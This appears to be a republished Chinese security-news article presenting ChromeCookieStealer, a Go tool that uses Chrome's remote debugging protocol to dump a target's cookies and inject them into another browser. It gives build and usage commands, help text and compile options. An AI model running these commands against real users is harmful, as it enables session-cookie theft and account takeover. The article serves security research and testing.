如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie

admin
admin
admin
138858
文章
114
评论
2023年12月9日15:58:54评论35 views字数 1940阅读6分28秒阅读模式

如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie

如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie


关于ChromeCookieStealer


ChromeCookieStealer是一款功能强大的Cookie数据收集和注入工具,该工具需要配合Chrome使用,能够利用Chrome的远程DevTools(开发者工具)协议实现浏览器Cookie的数据收集、注入、清理和删除操作。

该工具支持使用Chrome自己的格式并以JSON对象形式转储Cookie数据,Cookie数据的加载和注入同样使用的是这类数据格式。该工具仅供安全研究和测试使用,请勿将其用于其他目的。

功能介绍

1、转储Chrome浏览器的Cookie数据;
2、将转储的Cookie数据注入到其他Chrome实例中;
3、清理Chrome的Cookie数据;
4、编译过程中支持自定义设置;

工具下载


由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。

接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:


    
	
  • 



git clone https://github.com/magisterquis/chromecookiestealer.git






(向右滑动,查看更多)




然后切换到项目目录中,使用go build命令构建项目源码:




    
	
  • 
	
  • 



cd chromecookiestealergo build











 工具快速使用 




构建完成后,执行下列命令即可收集目标用户Chrome浏览器中的Cookie数据:




    
	
  • 
	
  • 
	
  • 



pkill Chrome/Applications/Google Chrome.app/Contents/MacOS/Google Chrome --remote-debugging-port=9222 --restore-last-session # 需要根据目标情况修改./chromecookiestealer -dump ./cookies.json






(向右滑动,查看更多




下列命令可以将转储的Cookie数据注入到研究人员的本地浏览器中:




    
	
  • 
	
  • 
	
  • 



# 使用一个调试端口启动Chrome,具体可参考上面的命令

./chromecookiestealer -clear -inject ./cookies.json






(向右滑动,查看更多)







 工具帮助信息 




    
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 
	
  • 



Usage: chromecookiestealer [options]

Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)

and, in order and as requested:

- Dumps cookies

- Clears cookies

- Injects cookies

- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON

objects with the following string fields: 

name   - 要删除的Cookie名称

url    -  删除跟指定域名或URL匹配的所有Cookie

domain - 仅删除指定域名的Cookie

path   - 仅删除指定路径的Cookie

Filenames may also be "-" for stdin/stdout.

Options:

  -chrome URL

     Chrome远程调试URL (默认为"ws://127.0.0.1:9222")

  -clear

     清理浏览器Cookie

  -delete file

     包含要删除Cookie参数的文件名称

  -dump file

     转储Cookie的文件名称

  -inject file

     需要注入的包含Cookie的文件名称

  -no-summary

     退出时不打印概述信息

  -verbose

     启用Verbose日志






(向右滑动,查看更多)







 其他编译选项 







一般情况下,go build命令足够满足绝大部分用户的需求。如果你需要执行更有针对性的安全测试,可以在编译过程中使用“-ldflags '-X main.Foo=bar'”选项实现自定义配置。













变量




描述








DumpFile




转储Cookie的文件名称,在-dump中设置








InjectFile




需要注入的文件名称,在-inject中设置








DeleteFile




描述需要删除Cookie的文件名称,在-delete中设置








DoClear




是否需要清理Cookie,在-clear中设置













需要注意的是,上述所有的选项/变量默认都是未设置的。







 许可证协议 




本项目的开发与发布遵循BSD-3-Clause开源许可证协议。







 项目地址 







ChromeCookieStealerhttps://github.com/magisterquis/chromecookiestealer











原文始发于微信公众号(FreeBuf):如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月9日15:58:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookiehttps://cn-sec.com/archives/2281332.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息